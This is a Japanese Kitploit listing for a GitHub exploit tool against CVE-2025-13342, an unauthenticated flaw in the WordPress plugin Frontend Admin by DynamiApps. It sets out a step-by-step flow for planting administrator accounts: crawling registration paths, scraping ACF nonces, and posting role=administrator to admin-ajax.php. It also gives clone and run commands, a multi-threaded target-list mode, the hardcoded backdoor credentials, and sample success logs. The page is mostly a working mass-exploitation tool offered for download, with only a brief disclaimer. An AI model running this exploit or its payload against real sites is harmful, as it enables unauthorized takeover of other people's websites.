Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/nxploited/cve-2025-13342
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - 未認証の任意オプション更新

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-13342

Frontend Admin by DynamiApps <= 3.28.20 - 未認証での任意オプション更新

⚡ CVE-2025-13342

Frontend Admin by DynamiApps — 未認証での管理者アカウント作成

root@kitploit:~
   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin Auth

Python

◈ 脆弱性

項目詳細
CVE IDCVE-2025-13342
スコア9.8 CRITICAL(重大) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
影響を受けるバージョンFrontend Admin by DynamiApps ≤ 3.28.20
認証不要 — 完全に未認証
種別不十分な権限チェック+入力検証 → 任意オプション書き込み
CWECWE-284 · 不適切なアクセス制御

何が起こるか:
ActionOptions::run() の保存ハンドラは、wp_options への書き込み前にユーザー権限のチェックも入力検証も行いません。公開された ACF フロントエンドフォームがオープンな書き込みチャネルになります。攻撃者は users_can_register=1 と default_role=administrator を設定し、新しいアカウントを登録すると、自動的に Administrator ロールが付与されます。

このツールは、その2段階のアプローチをスキップします — acff[user][field_*] を介してユーザー作成フィールドに role=administrator を注入した細工済みフォームペイロードを直接送信し、1回の AJAX 呼び出しで管理者アカウントを作成します。


◈ エクスプロイトの動作

root@kitploit:~
1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ 要件

root@kitploit:~
requests
beautifulsoup4
colorama
rich
root@kitploit:~
pip install requests beautifulsoup4 colorama rich

◈ インストールと実行

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ 使い方

このツールは対話式です。次の4つの質問が表示されます:

root@kitploit:~
Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

認証情報は内部的に固定されています:

項目値
ユーザー名Nxadmin1
メールアドレス[email protected]
パスワードNxAdmin_1337#KSA

◈ ターゲットファイル

1行に1ホスト — スキームは任意:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

◈ スキャン対象の登録パス

このツールはターゲットごとに 28個のパス を順に調べ、最初に見つかった有効な ACF フォームで停止します:

root@kitploit:~
/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ 出力

ファイル内容
acf_success.txt管理者作成の成功が確認された記録

形式:

root@kitploit:~
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

端末出力:

root@kitploit:~
[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ 連絡先

作成者Nxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ 免責事項

このツールは許可されたセキュリティ研究および教育目的のみで提供されます。
作成者は、所有者からの明示的な書面による許可なしにシステムに対して使用された場合の一切の責任を負いません。
未許可のアクセスは、CFAA、CMA、および世界各国の同等の法律に基づき違法です。
あなた自身の行動に対する責任はすべてあなたにあります。


© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · Fixed in 3.28.21
ツールをダウンロード